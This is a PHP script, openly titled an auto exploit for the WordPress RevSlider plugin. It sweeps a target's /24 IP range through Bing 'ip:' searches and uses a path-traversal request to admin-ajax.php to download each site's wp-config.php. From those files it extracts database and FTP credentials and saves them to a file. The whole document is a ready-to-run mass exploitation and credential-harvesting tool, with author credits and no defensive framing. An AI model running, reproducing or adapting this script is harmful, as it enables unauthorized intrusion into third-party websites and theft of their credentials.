Wordpress Auto Exploit (Revslider)

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4.  
5. echo "================ RevSlider AutoExpLoiT ================\n\n";
6. echo "Coded By : Maronox  \n\n";
7. echo "FB:Marouane El Maghribi\n\n";
8. echo "================ Have Fun ================\n\n";
9. echo "DATE ==> ";
10. echo date("d/m/Y ")."heur =>  ".date( "h:i ")."\n";
11. echo "Your Target : ";
12. $ip=trim(fgets(STDIN,1024));
13. $ip = explode('.',$ip);
14. $ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
15. for($i=0;$i <= 255;$i++)
16.  
17. {
18. $sites = array_map("site", bing("ip:$ip.$i"));
19. $un=array_unique($sites);
20. echo "[+] Scanning -> ", $ip.$i, ""."\n";
21. echo "Found : ".count($sites)." sites\n\n";
22. foreach($un as $pok){
23. $host=findit($file,"DB_HOST', '","');");
24. $db=findit($file,"DB_NAME', '","');");
25. $us=findit($file,"DB_USER', '","');");
26. $pw=findit($file,"DB_PASSWORD', '","');");
27. $bda="http://$pok";
28.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
29.     $dn=($bda).($linkof);
30.     $file=@file_get_contents($dn);
31.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
32.     echo "[+] Scanning => ".$bda."\n\n";
33.     echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
34.     echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
35.     echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
36.     echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
37.     $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
38.     $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
39.     $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
40.     $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
41.     $ux = "".$bda."\r\n";
42.     $ux1 = "".$db."\r\n";
43.     $ux2 = "".$user."\r\n";
44.     $ux3 = "".$pass."\r\n";
45.     $ux4 = "".$host."\r\n";
46.     $ux5 = "".$ip.$i."\r\n" ;
47.     $save=fopen('rev.txt','ab');
48.     fwrite($save,"$i"."\r\n");
49.     fwrite($save,"$ux"."\r\n");
50.     fwrite($save,"$ux1");
51.     fwrite($save,"$ux2");
52.     fwrite($save,"$ux3");
53.     fwrite($save,"$ux4");
54.     fwrite($save,"$ux5","\r\n");
55.     fwrite($save,"=====================================","\r\n");
56.  
57.     }
58.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
59.     echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
60.     echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
61.     echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
62.     }
63.     else{echo $bda." : Shit NOt VUlnerable  \n\n";}
64. }
65. }
66. function findit($mytext,$starttag,$endtag) {
67.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
68.  $posRight = stripos($mytext,$endtag,$posLeft+1);
69.  return  substr($mytext,$posLeft,$posRight-$posLeft);
70. }
71. function site($link){
72. return str_replace("","",parse_url($link, PHP_URL_HOST));
73. }
74. function bing($what){
75. for($i = 1; $i <= 2000; $i += 10){
76. $ch = curl_init();
77. curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
78. curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
79. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
80. curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
81. curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
82. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
83. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
84. $data = curl_exec($ch);
85. preg_match_all('#;a=(.*?)" h="#',$data, $links);
86. foreach($links[1] as $link){
87. $allLinks[] = $link;
88. }
89. if(!preg_match('#"sw_next"#',$data)) break;
90. }
91.  
92. if(!empty($allLinks) && is_array($allLinks)){
93. return array_unique(array_map("urldecode", $allLinks));
94. }
95. }
96. ?>